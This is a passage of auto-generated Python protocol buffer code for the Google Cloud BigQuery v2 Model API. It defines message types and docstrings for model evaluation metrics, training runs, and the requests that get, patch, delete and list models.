_MODEL_REGRESSIONMETRICS.fields_by_name[
"median_absolute_error"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_REGRESSIONMETRICS.fields_by_name[
"r_squared"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_REGRESSIONMETRICS.containing_type = _MODEL
_MODEL_AGGREGATECLASSIFICATIONMETRICS.fields_by_name[
"precision"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_AGGREGATECLASSIFICATIONMETRICS.fields_by_name[
"recall"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_AGGREGATECLASSIFICATIONMETRICS.fields_by_name[
"accuracy"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_AGGREGATECLASSIFICATIONMETRICS.fields_by_name[
"threshold"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_AGGREGATECLASSIFICATIONMETRICS.fields_by_name[
"f1_score"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_AGGREGATECLASSIFICATIONMETRICS.fields_by_name[
"log_loss"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_AGGREGATECLASSIFICATIONMETRICS.fields_by_name[
"roc_auc"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_AGGREGATECLASSIFICATIONMETRICS.containing_type = _MODEL
_MODEL_BINARYCLASSIFICATIONMETRICS_BINARYCONFUSIONMATRIX.fields_by_name[
"positive_class_threshold"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_BINARYCLASSIFICATIONMETRICS_BINARYCONFUSIONMATRIX.fields_by_name[
"true_positives"
].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_MODEL_BINARYCLASSIFICATIONMETRICS_BINARYCONFUSIONMATRIX.fields_by_name[
"false_positives"
].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_MODEL_BINARYCLASSIFICATIONMETRICS_BINARYCONFUSIONMATRIX.fields_by_name[
"true_negatives"
].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_MODEL_BINARYCLASSIFICATIONMETRICS_BINARYCONFUSIONMATRIX.fields_by_name[
"false_negatives"
].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_MODEL_BINARYCLASSIFICATIONMETRICS_BINARYCONFUSIONMATRIX.fields_by_name[
"precision"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_BINARYCLASSIFICATIONMETRICS_BINARYCONFUSIONMATRIX.fields_by_name[
"recall"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_BINARYCLASSIFICATIONMETRICS_BINARYCONFUSIONMATRIX.fields_by_name[
"f1_score"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_BINARYCLASSIFICATIONMETRICS_BINARYCONFUSIONMATRIX.fields_by_name[
"accuracy"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_BINARYCLASSIFICATIONMETRICS_BINARYCONFUSIONMATRIX.containing_type = (
_MODEL_BINARYCLASSIFICATIONMETRICS
)
_MODEL_BINARYCLASSIFICATIONMETRICS.fields_by_name[
"aggregate_classification_metrics"
].message_type = _MODEL_AGGREGATECLASSIFICATIONMETRICS
_MODEL_BINARYCLASSIFICATIONMETRICS.fields_by_name[
"binary_confusion_matrix_list"
].message_type = _MODEL_BINARYCLASSIFICATIONMETRICS_BINARYCONFUSIONMATRIX
_MODEL_BINARYCLASSIFICATIONMETRICS.containing_type = _MODEL
_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX_ENTRY.fields_by_name[
"item_count"
].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX_ENTRY.containing_type = (
_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX
)
_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX_ROW.fields_by_name[
"entries"
].message_type = _MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX_ENTRY
_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX_ROW.containing_type = (
_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX
)
_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX.fields_by_name[
"confidence_threshold"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX.fields_by_name[
"rows"
].message_type = _MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX_ROW
_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX.containing_type = (
_MODEL_MULTICLASSCLASSIFICATIONMETRICS
)
_MODEL_MULTICLASSCLASSIFICATIONMETRICS.fields_by_name[
"aggregate_classification_metrics"
].message_type = _MODEL_AGGREGATECLASSIFICATIONMETRICS
_MODEL_MULTICLASSCLASSIFICATIONMETRICS.fields_by_name[
"confusion_matrix_list"
].message_type = _MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX
_MODEL_MULTICLASSCLASSIFICATIONMETRICS.containing_type = _MODEL
_MODEL_CLUSTERINGMETRICS.fields_by_name[
"davies_bouldin_index"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_CLUSTERINGMETRICS.fields_by_name[
"mean_squared_distance"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_CLUSTERINGMETRICS.containing_type = _MODEL
_MODEL_EVALUATIONMETRICS.fields_by_name[
"regression_metrics"
].message_type = _MODEL_REGRESSIONMETRICS
_MODEL_EVALUATIONMETRICS.fields_by_name[
"binary_classification_metrics"
].message_type = _MODEL_BINARYCLASSIFICATIONMETRICS
_MODEL_EVALUATIONMETRICS.fields_by_name[
"multi_class_classification_metrics"
].message_type = _MODEL_MULTICLASSCLASSIFICATIONMETRICS
_MODEL_EVALUATIONMETRICS.fields_by_name[
"clustering_metrics"
].message_type = _MODEL_CLUSTERINGMETRICS
_MODEL_EVALUATIONMETRICS.containing_type = _MODEL
_MODEL_EVALUATIONMETRICS.oneofs_by_name["metrics"].fields.append(
_MODEL_EVALUATIONMETRICS.fields_by_name["regression_metrics"]
)
_MODEL_EVALUATIONMETRICS.fields_by_name[
"regression_metrics"
].containing_oneof = _MODEL_EVALUATIONMETRICS.oneofs_by_name["metrics"]
_MODEL_EVALUATIONMETRICS.oneofs_by_name["metrics"].fields.append(
_MODEL_EVALUATIONMETRICS.fields_by_name["binary_classification_metrics"]
)
_MODEL_EVALUATIONMETRICS.fields_by_name[
"binary_classification_metrics"
].containing_oneof = _MODEL_EVALUATIONMETRICS.oneofs_by_name["metrics"]
_MODEL_EVALUATIONMETRICS.oneofs_by_name["metrics"].fields.append(
_MODEL_EVALUATIONMETRICS.fields_by_name["multi_class_classification_metrics"]
)
_MODEL_EVALUATIONMETRICS.fields_by_name[
"multi_class_classification_metrics"
].containing_oneof = _MODEL_EVALUATIONMETRICS.oneofs_by_name["metrics"]
_MODEL_EVALUATIONMETRICS.oneofs_by_name["metrics"].fields.append(
_MODEL_EVALUATIONMETRICS.fields_by_name["clustering_metrics"]
)
_MODEL_EVALUATIONMETRICS.fields_by_name[
"clustering_metrics"
].containing_oneof = _MODEL_EVALUATIONMETRICS.oneofs_by_name["metrics"]
_MODEL_TRAININGRUN_TRAININGOPTIONS_LABELCLASSWEIGHTSENTRY.containing_type = (
_MODEL_TRAININGRUN_TRAININGOPTIONS
)
_MODEL_TRAININGRUN_TRAININGOPTIONS.fields_by_name[
"loss_type"
].enum_type = _MODEL_LOSSTYPE
_MODEL_TRAININGRUN_TRAININGOPTIONS.fields_by_name[
"l1_regularization"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_TRAININGRUN_TRAININGOPTIONS.fields_by_name[
"l2_regularization"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_TRAININGRUN_TRAININGOPTIONS.fields_by_name[
"min_relative_progress"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_TRAININGRUN_TRAININGOPTIONS.fields_by_name[
"warm_start"
].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_MODEL_TRAININGRUN_TRAININGOPTIONS.fields_by_name[
"early_stop"
].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_MODEL_TRAININGRUN_TRAININGOPTIONS.fields_by_name[
"data_split_method"
].enum_type = _MODEL_DATASPLITMETHOD
_MODEL_TRAININGRUN_TRAININGOPTIONS.fields_by_name[
"learn_rate_strategy"
].enum_type = _MODEL_LEARNRATESTRATEGY
_MODEL_TRAININGRUN_TRAININGOPTIONS.fields_by_name[
"label_class_weights"
].message_type = _MODEL_TRAININGRUN_TRAININGOPTIONS_LABELCLASSWEIGHTSENTRY
_MODEL_TRAININGRUN_TRAININGOPTIONS.fields_by_name[
"distance_type"
].enum_type = _MODEL_DISTANCETYPE
_MODEL_TRAININGRUN_TRAININGOPTIONS.fields_by_name[
"optimization_strategy"
].enum_type = _MODEL_OPTIMIZATIONSTRATEGY
_MODEL_TRAININGRUN_TRAININGOPTIONS.containing_type = _MODEL_TRAININGRUN
_MODEL_TRAININGRUN_ITERATIONRESULT_CLUSTERINFO.fields_by_name[
"cluster_radius"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_TRAININGRUN_ITERATIONRESULT_CLUSTERINFO.fields_by_name[
"cluster_size"
].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_MODEL_TRAININGRUN_ITERATIONRESULT_CLUSTERINFO.containing_type = (
_MODEL_TRAININGRUN_ITERATIONRESULT
)
_MODEL_TRAININGRUN_ITERATIONRESULT.fields_by_name[
"index"
].message_type = google_dot_protobuf_dot_wrappers__pb2._INT32VALUE
_MODEL_TRAININGRUN_ITERATIONRESULT.fields_by_name[
"duration_ms"
].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_MODEL_TRAININGRUN_ITERATIONRESULT.fields_by_name[
"training_loss"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_TRAININGRUN_ITERATIONRESULT.fields_by_name[
"eval_loss"
].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_MODEL_TRAININGRUN_ITERATIONRESULT.fields_by_name[
"cluster_infos"
].message_type = _MODEL_TRAININGRUN_ITERATIONRESULT_CLUSTERINFO
_MODEL_TRAININGRUN_ITERATIONRESULT.containing_type = _MODEL_TRAININGRUN
_MODEL_TRAININGRUN.fields_by_name[
"training_options"
].message_type = _MODEL_TRAININGRUN_TRAININGOPTIONS
_MODEL_TRAININGRUN.fields_by_name[
"start_time"
].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_MODEL_TRAININGRUN.fields_by_name[
"results"
].message_type = _MODEL_TRAININGRUN_ITERATIONRESULT
_MODEL_TRAININGRUN.fields_by_name[
"evaluation_metrics"
].message_type = _MODEL_EVALUATIONMETRICS
_MODEL_TRAININGRUN.containing_type = _MODEL
_MODEL_LABELSENTRY.containing_type = _MODEL
_MODEL.fields_by_name[
"model_reference"
].message_type = (
google_dot_cloud_dot_bigquery__v2_dot_proto_dot_model__reference__pb2._MODELREFERENCE
)
_MODEL.fields_by_name["labels"].message_type = _MODEL_LABELSENTRY
_MODEL.fields_by_name["model_type"].enum_type = _MODEL_MODELTYPE
_MODEL.fields_by_name["training_runs"].message_type = _MODEL_TRAININGRUN
_MODEL.fields_by_name[
"feature_columns"
].message_type = (
google_dot_cloud_dot_bigquery__v2_dot_proto_dot_standard__sql__pb2._STANDARDSQLFIELD
)
_MODEL.fields_by_name[
"label_columns"
].message_type = (
google_dot_cloud_dot_bigquery__v2_dot_proto_dot_standard__sql__pb2._STANDARDSQLFIELD
)
_MODEL_MODELTYPE.containing_type = _MODEL
_MODEL_LOSSTYPE.containing_type = _MODEL
_MODEL_DISTANCETYPE.containing_type = _MODEL
_MODEL_DATASPLITMETHOD.containing_type = _MODEL
_MODEL_LEARNRATESTRATEGY.containing_type = _MODEL
_MODEL_OPTIMIZATIONSTRATEGY.containing_type = _MODEL
_PATCHMODELREQUEST.fields_by_name["model"].message_type = _MODEL
_LISTMODELSREQUEST.fields_by_name[
"max_results"
].message_type = google_dot_protobuf_dot_wrappers__pb2._UINT32VALUE
_LISTMODELSRESPONSE.fields_by_name["models"].message_type = _MODEL
DESCRIPTOR.message_types_by_name["Model"] = _MODEL
DESCRIPTOR.message_types_by_name["GetModelRequest"] = _GETMODELREQUEST
DESCRIPTOR.message_types_by_name["PatchModelRequest"] = _PATCHMODELREQUEST
DESCRIPTOR.message_types_by_name["DeleteModelRequest"] = _DELETEMODELREQUEST
DESCRIPTOR.message_types_by_name["ListModelsRequest"] = _LISTMODELSREQUEST
DESCRIPTOR.message_types_by_name["ListModelsResponse"] = _LISTMODELSRESPONSE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Model = _reflection.GeneratedProtocolMessageType(
"Model",
(_message.Message,),
dict(
RegressionMetrics=_reflection.GeneratedProtocolMessageType(
"RegressionMetrics",
(_message.Message,),
dict(
DESCRIPTOR=_MODEL_REGRESSIONMETRICS,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Evaluation metrics for regression models.
Attributes:
mean_absolute_error:
Mean absolute error.
mean_squared_error:
Mean squared error.
mean_squared_log_error:
Mean squared log error.
median_absolute_error:
Median absolute error.
r_squared:
R^2 score.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.Model.RegressionMetrics)
),
),
AggregateClassificationMetrics=_reflection.GeneratedProtocolMessageType(
"AggregateClassificationMetrics",
(_message.Message,),
dict(
DESCRIPTOR=_MODEL_AGGREGATECLASSIFICATIONMETRICS,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Aggregate metrics for classification/classifier models. For multi-class
models, the metrics are either macro-averaged or micro-averaged. When
macro-averaged, the metrics are calculated for each label and then an
unweighted average is taken of those values. When micro-averaged, the
metric is calculated globally by counting the total number of correctly
predicted rows.
Attributes:
precision:
Precision is the fraction of actual positive predictions that
had positive actual labels. For multiclass this is a macro-
averaged metric treating each class as a binary classifier.
recall:
Recall is the fraction of actual positive labels that were
given a positive prediction. For multiclass this is a macro-
averaged metric.
accuracy:
Accuracy is the fraction of predictions given the correct
label. For multiclass this is a micro-averaged metric.
threshold:
Threshold at which the metrics are computed. For binary
classification models this is the positive class threshold.
For multi-class classfication models this is the confidence
threshold.
f1_score:
The F1 score is an average of recall and precision. For
multiclass this is a macro-averaged metric.
log_loss:
Logarithmic Loss. For multiclass this is a macro-averaged
metric.
roc_auc:
Area Under a ROC Curve. For multiclass this is a macro-
averaged metric.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.Model.AggregateClassificationMetrics)
),
),
BinaryClassificationMetrics=_reflection.GeneratedProtocolMessageType(
"BinaryClassificationMetrics",
(_message.Message,),
dict(
BinaryConfusionMatrix=_reflection.GeneratedProtocolMessageType(
"BinaryConfusionMatrix",
(_message.Message,),
dict(
DESCRIPTOR=_MODEL_BINARYCLASSIFICATIONMETRICS_BINARYCONFUSIONMATRIX,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Confusion matrix for binary classification models.
Attributes:
positive_class_threshold:
Threshold value used when computing each of the following
metric.
true_positives:
Number of true samples predicted as true.
false_positives:
Number of false samples predicted as true.
true_negatives:
Number of true samples predicted as false.
false_negatives:
Number of false samples predicted as false.
precision:
The fraction of actual positive predictions that had positive
actual labels.
recall:
The fraction of actual positive labels that were given a
positive prediction.
f1_score:
The equally weighted average of recall and precision.
accuracy:
The fraction of predictions given the correct label.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.Model.BinaryClassificationMetrics.BinaryConfusionMatrix)
),
),
DESCRIPTOR=_MODEL_BINARYCLASSIFICATIONMETRICS,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Evaluation metrics for binary classification/classifier models.
Attributes:
aggregate_classification_metrics:
Aggregate classification metrics.
binary_confusion_matrix_list:
Binary confusion matrix at multiple thresholds.
positive_label:
Label representing the positive class.
negative_label:
Label representing the negative class.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.Model.BinaryClassificationMetrics)
),
),
MultiClassClassificationMetrics=_reflection.GeneratedProtocolMessageType(
"MultiClassClassificationMetrics",
(_message.Message,),
dict(
ConfusionMatrix=_reflection.GeneratedProtocolMessageType(
"ConfusionMatrix",
(_message.Message,),
dict(
Entry=_reflection.GeneratedProtocolMessageType(
"Entry",
(_message.Message,),
dict(
DESCRIPTOR=_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX_ENTRY,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""A single entry in the confusion matrix.
Attributes:
predicted_label:
The predicted label. For confidence\_threshold > 0, we will
also add an entry indicating the number of items under the
confidence threshold.
item_count:
Number of items being predicted as this label.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics.ConfusionMatrix.Entry)
),
),
Row=_reflection.GeneratedProtocolMessageType(
"Row",
(_message.Message,),
dict(
DESCRIPTOR=_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX_ROW,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""A single row in the confusion matrix.
Attributes:
actual_label:
The original label of this row.
entries:
Info describing predicted label distribution.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics.ConfusionMatrix.Row)
),
),
DESCRIPTOR=_MODEL_MULTICLASSCLASSIFICATIONMETRICS_CONFUSIONMATRIX,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Confusion matrix for multi-class classification models.
Attributes:
confidence_threshold:
Confidence threshold used when computing the entries of the
confusion matrix.
rows:
One row per actual label.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics.ConfusionMatrix)
),
),
DESCRIPTOR=_MODEL_MULTICLASSCLASSIFICATIONMETRICS,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Evaluation metrics for multi-class classification/classifier models.
Attributes:
aggregate_classification_metrics:
Aggregate classification metrics.
confusion_matrix_list:
Confusion matrix at different thresholds.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.Model.MultiClassClassificationMetrics)
),
),
ClusteringMetrics=_reflection.GeneratedProtocolMessageType(
"ClusteringMetrics",
(_message.Message,),
dict(
DESCRIPTOR=_MODEL_CLUSTERINGMETRICS,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Evaluation metrics for clustering models.
Attributes:
davies_bouldin_index:
Davies-Bouldin index.
mean_squared_distance:
Mean of squared distances between each sample to its cluster
centroid.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.Model.ClusteringMetrics)
),
),
EvaluationMetrics=_reflection.GeneratedProtocolMessageType(
"EvaluationMetrics",
(_message.Message,),
dict(
DESCRIPTOR=_MODEL_EVALUATIONMETRICS,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Evaluation metrics of a model. These are either computed on all training
data or just the eval data based on whether eval data was used during
training. These are not present for imported models.
Attributes:
regression_metrics:
Populated for regression models.
binary_classification_metrics:
Populated for binary classification/classifier models.
multi_class_classification_metrics:
Populated for multi-class classification/classifier models.
clustering_metrics:
[Beta] Populated for clustering models.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.Model.EvaluationMetrics)
),
),
TrainingRun=_reflection.GeneratedProtocolMessageType(
"TrainingRun",
(_message.Message,),
dict(
TrainingOptions=_reflection.GeneratedProtocolMessageType(
"TrainingOptions",
(_message.Message,),
dict(
LabelClassWeightsEntry=_reflection.GeneratedProtocolMessageType(
"LabelClassWeightsEntry",
(_message.Message,),
dict(
DESCRIPTOR=_MODEL_TRAININGRUN_TRAININGOPTIONS_LABELCLASSWEIGHTSENTRY,
__module__="google.cloud.bigquery_v2.proto.model_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.LabelClassWeightsEntry)
),
),
DESCRIPTOR=_MODEL_TRAININGRUN_TRAININGOPTIONS,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Protocol buffer.
Attributes:
max_iterations:
The maximum number of iterations in training. Used only for
iterative training algorithms.
loss_type:
Type of loss function used during training run.
learn_rate:
Learning rate in training. Used only for iterative training
algorithms.
l1_regularization:
L1 regularization coefficient.
l2_regularization:
L2 regularization coefficient.
min_relative_progress:
When early\_stop is true, stops training when accuracy
improvement is less than 'min\_relative\_progress'. Used only
for iterative training algorithms.
warm_start:
Whether to train a model from the last checkpoint.
early_stop:
Whether to stop early when the loss doesn't improve
significantly any more (compared to min\_relative\_progress).
Used only for iterative training algorithms.
input_label_columns:
Name of input label columns in training data.
data_split_method:
The data split type for training and evaluation, e.g. RANDOM.
data_split_eval_fraction:
The fraction of evaluation data over the whole input data. The
rest of data will be used as training data. The format should
be double. Accurate to two decimal places. Default value is
0.2.
data_split_column:
The column to split data with. This column won't be used as a
feature. 1. When data\_split\_method is CUSTOM, the
corresponding column should be boolean. The rows with true
value tag are eval data, and the false are training data. 2.
When data\_split\_method is SEQ, the first
DATA\_SPLIT\_EVAL\_FRACTION rows (from smallest to largest) in
the corresponding column are used as training data, and the
rest are eval data. It respects the order in Orderable data
types:
https://cloud.google.com/bigquery/docs/reference/standard-
sql/data-types#data-type-properties
learn_rate_strategy:
The strategy to determine learn rate for the current
iteration.
initial_learn_rate:
Specifies the initial learning rate for the line search learn
rate strategy.
label_class_weights:
Weights associated with each label class, for rebalancing the
training data. Only applicable for classification models.
distance_type:
[Beta] Distance type for clustering models.
num_clusters:
[Beta] Number of clusters for clustering models.
model_uri:
[Beta] Google Cloud Storage URI from which the model was
imported. Only applicable for imported models.
optimization_strategy:
Optimization strategy for training linear regression models.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions)
),
),
IterationResult=_reflection.GeneratedProtocolMessageType(
"IterationResult",
(_message.Message,),
dict(
ClusterInfo=_reflection.GeneratedProtocolMessageType(
"ClusterInfo",
(_message.Message,),
dict(
DESCRIPTOR=_MODEL_TRAININGRUN_ITERATIONRESULT_CLUSTERINFO,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Information about a single cluster for clustering model.
Attributes:
centroid_id:
Centroid id.
cluster_radius:
Cluster radius, the average distance from centroid to each
point assigned to the cluster.
cluster_size:
Cluster size, the total number of points assigned to the
cluster.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.Model.TrainingRun.IterationResult.ClusterInfo)
),
),
DESCRIPTOR=_MODEL_TRAININGRUN_ITERATIONRESULT,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Information about a single iteration of the training run.
Attributes:
index:
Index of the iteration, 0 based.
duration_ms:
Time taken to run the iteration in milliseconds.
training_loss:
Loss computed on the training data at the end of iteration.
eval_loss:
Loss computed on the eval data at the end of iteration.
learn_rate:
Learn rate used for this iteration.
cluster_infos:
[Beta] Information about top clusters for clustering models.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.Model.TrainingRun.IterationResult)
),
),
DESCRIPTOR=_MODEL_TRAININGRUN,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Information about a single training query run for the model.
Attributes:
training_options:
Options that were used for this training run, includes user
specified and default options that were used.
start_time:
The start time of this training run.
results:
Output of each iteration run, results.size() <=
max\_iterations.
evaluation_metrics:
The evaluation metrics over training/eval data that were
computed at the end of training.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.Model.TrainingRun)
),
),
LabelsEntry=_reflection.GeneratedProtocolMessageType(
"LabelsEntry",
(_message.Message,),
dict(
DESCRIPTOR=_MODEL_LABELSENTRY,
__module__="google.cloud.bigquery_v2.proto.model_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.Model.LabelsEntry)
),
),
DESCRIPTOR=_MODEL,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Protocol buffer.
Attributes:
etag:
Output only. A hash of this resource.
model_reference:
Required. Unique identifier for this model.
creation_time:
Output only. The time when this model was created, in
millisecs since the epoch.
last_modified_time:
Output only. The time when this model was last modified, in
millisecs since the epoch.
description:
[Optional] A user-friendly description of this model.
friendly_name:
[Optional] A descriptive name for this model.
labels:
[Optional] The labels associated with this model. You can use
these to organize and group your models. Label keys and values
can be no longer than 63 characters, can only contain
lowercase letters, numeric characters, underscores and dashes.
International characters are allowed. Label values are
optional. Label keys must start with a letter and each label
in the list must have a different key.
expiration_time:
[Optional] The time when this model expires, in milliseconds
since the epoch. If not present, the model will persist
indefinitely. Expired models will be deleted and their storage
reclaimed. The defaultTableExpirationMs property of the
encapsulating dataset can be used to set a default
expirationTime on newly created models.
location:
Output only. The geographic location where the model resides.
This value is inherited from the dataset.
model_type:
Output only. Type of the model resource.
training_runs:
Output only. Information for all training runs in increasing
order of start\_time.
feature_columns:
Output only. Input feature columns that were used to train
this model.
label_columns:
Output only. Label columns that were used to train this model.
The output of the model will have a "predicted\_" prefix to
these columns.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.Model)
),
)
_sym_db.RegisterMessage(Model)
_sym_db.RegisterMessage(Model.RegressionMetrics)
_sym_db.RegisterMessage(Model.AggregateClassificationMetrics)
_sym_db.RegisterMessage(Model.BinaryClassificationMetrics)
_sym_db.RegisterMessage(Model.BinaryClassificationMetrics.BinaryConfusionMatrix)
_sym_db.RegisterMessage(Model.MultiClassClassificationMetrics)
_sym_db.RegisterMessage(Model.MultiClassClassificationMetrics.ConfusionMatrix)
_sym_db.RegisterMessage(Model.MultiClassClassificationMetrics.ConfusionMatrix.Entry)
_sym_db.RegisterMessage(Model.MultiClassClassificationMetrics.ConfusionMatrix.Row)
_sym_db.RegisterMessage(Model.ClusteringMetrics)
_sym_db.RegisterMessage(Model.EvaluationMetrics)
_sym_db.RegisterMessage(Model.TrainingRun)
_sym_db.RegisterMessage(Model.TrainingRun.TrainingOptions)
_sym_db.RegisterMessage(Model.TrainingRun.TrainingOptions.LabelClassWeightsEntry)
_sym_db.RegisterMessage(Model.TrainingRun.IterationResult)
_sym_db.RegisterMessage(Model.TrainingRun.IterationResult.ClusterInfo)
_sym_db.RegisterMessage(Model.LabelsEntry)
GetModelRequest = _reflection.GeneratedProtocolMessageType(
"GetModelRequest",
(_message.Message,),
dict(
DESCRIPTOR=_GETMODELREQUEST,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Protocol buffer.
Attributes:
project_id:
Project ID of the requested model.
dataset_id:
Dataset ID of the requested model.
model_id:
Model ID of the requested model.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.GetModelRequest)
),
)
_sym_db.RegisterMessage(GetModelRequest)
PatchModelRequest = _reflection.GeneratedProtocolMessageType(
"PatchModelRequest",
(_message.Message,),
dict(
DESCRIPTOR=_PATCHMODELREQUEST,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Protocol buffer.
Attributes:
project_id:
Project ID of the model to patch.
dataset_id:
Dataset ID of the model to patch.
model_id:
Model ID of the model to patch.
model:
Patched model. Follows patch semantics. Missing fields are not
updated. To clear a field, explicitly set to default value.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.PatchModelRequest)
),
)
_sym_db.RegisterMessage(PatchModelRequest)
DeleteModelRequest = _reflection.GeneratedProtocolMessageType(
"DeleteModelRequest",
(_message.Message,),
dict(
DESCRIPTOR=_DELETEMODELREQUEST,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Protocol buffer.
Attributes:
project_id:
Project ID of the model to delete.
dataset_id:
Dataset ID of the model to delete.
model_id:
Model ID of the model to delete.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.DeleteModelRequest)
),
)
_sym_db.RegisterMessage(DeleteModelRequest)
ListModelsRequest = _reflection.GeneratedProtocolMessageType(
"ListModelsRequest",
(_message.Message,),
dict(
DESCRIPTOR=_LISTMODELSREQUEST,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Protocol buffer.
Attributes:
project_id:
Project ID of the models to list.
dataset_id:
Dataset ID of the models to list.
max_results:
The maximum number of results per page.
page_token:
Page token, returned by a previous call to request the next
page of results
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.ListModelsRequest)
),
)
_sym_db.RegisterMessage(ListModelsRequest)
ListModelsResponse = _reflection.GeneratedProtocolMessageType(
"ListModelsResponse",
(_message.Message,),
dict(
DESCRIPTOR=_LISTMODELSRESPONSE,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Protocol buffer.
Attributes:
models:
Models in the requested dataset. Only the following fields are
populated: model\_reference, model\_type, creation\_time,
last\_modified\_time and labels.
next_page_token:
A token to request the next page of results.
""",
